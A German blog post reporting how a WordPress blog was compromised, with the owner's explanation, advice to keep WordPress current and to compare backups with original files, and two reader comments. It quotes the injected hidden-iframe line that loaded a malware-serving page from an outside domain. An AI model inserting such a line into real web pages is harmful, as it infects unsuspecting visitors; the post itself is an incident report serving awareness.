Basic Thinking hacked

Das Blog von Robert Basic wurde gehacked.
Er hat es mittlerweile auf die neueste WordPress Version neu aufgesetzt.

Wie er gehacked wurde, erklärt er wie folgt:

1. Hacker hat in die Datei wp-includes/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, rechts das Original der WP-Version 2.0.7)
2. Somit wurde folgende Codezeile beim Generieren aller Blogseiten erzeugt:
iframe src=http://googlerank.info width=1 height=1 style=display:none
3. Wer die Startseite basicthinking.de mit einem ungeschützten PC besucht hat, vaD über ältere IE-Browser, war geküsst, da er sich damit einen Virus eingfangen hat (denn die infizierte Seite wurde per iframe mit geladen). Ohne dass der User vom vorigen Artikel gewusst hatte, rief er mich rein zufällig vorhin an, seine Tochter habe meine Startseite besucht und danach sei der PC verseucht gewesen. Das hat ihn mehrere Stunden gekostet, den PC wieder neu aufzusetzen. I’m very sorry. Surft man die besagte Domain mit einem sichereren Browser an, zB FF 3, wird die Seite geblockt.

Weitere Details finden sich in seinem Blog.

Normalerweise würde ich ja sagen: Kommt schon mal vor.
Doch da Robert in weiser Voraussicht im Mai noch einen Artikel über WordPress Sicherheit verfasst hat, finde ich das jetzt schon etwas peinlich. ;-)
Na ja, ok: Kommt schon mal vor!
So, genug gestichelt. Wenn wir mal gehacked werden, steht ihm dafür eine Retourkutsche zu. Versprochen. :-)

Wichtig: WordPress aktuell halten!
Wie das Beispiel von Roberts Blog zeigt, kann man sein System eigentlich nie aktuell genug halten.
Übrigens gibt es immer noch eine Menge Blogs, die auf alten WordPress Versionen laufen.
Ein aktuelles und prominentes Beispiel: Macnotes.de
Die Seiten von Macnotes läuft derzeit laut Quellcode noch auf WordPress 2.3.3.
Welche Schlafmütze kümmert sich dort eigentlich um die Server und die Seite?

Noch ein Tip:
Wir vergleichen unsere regelmäßigen Datensicherungen der Dateien immer wieder mit dem Original bzw. mit älteren Ständen. So sollten wir, zumindest hoffen wir das, es merken, wenn jemand uns Code unterjubelt. Gegen andere Hacks, die direkt in die Datenbank schreiben, hilft das natürlich nicht.

Dieser Beitrag wurde unter IT-Sicherheit veröffentlicht. Setze ein Lesezeichen auf den Permalink.

2 Antworten zu Basic Thinking hacked

  1. Robert sagt:

    an sich ist mir die Startseite völlig schnuppe, daher nicht drum groß gekümmert, was sich als Fehler erwiesen hat:))

  2. C.J. sagt:

    Du hast es ja zum Glück schnell gemerkt und die Leute offen über Dein Blog informiert.
    Schauen wir mal, wie lange die aktuelle Version von WordPress sicher ist.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

; -) :wink: :urlaub :twisted: :schnarch :rot :roll: :rip: :pennt :nanana :mrgreen: :mauer :lol: :kotz :idea: :evil: :cry: :banane :arrow: :D :?: :109 :-| :-x :-o :-P :-D :-? :) :( :!: 8-O 8)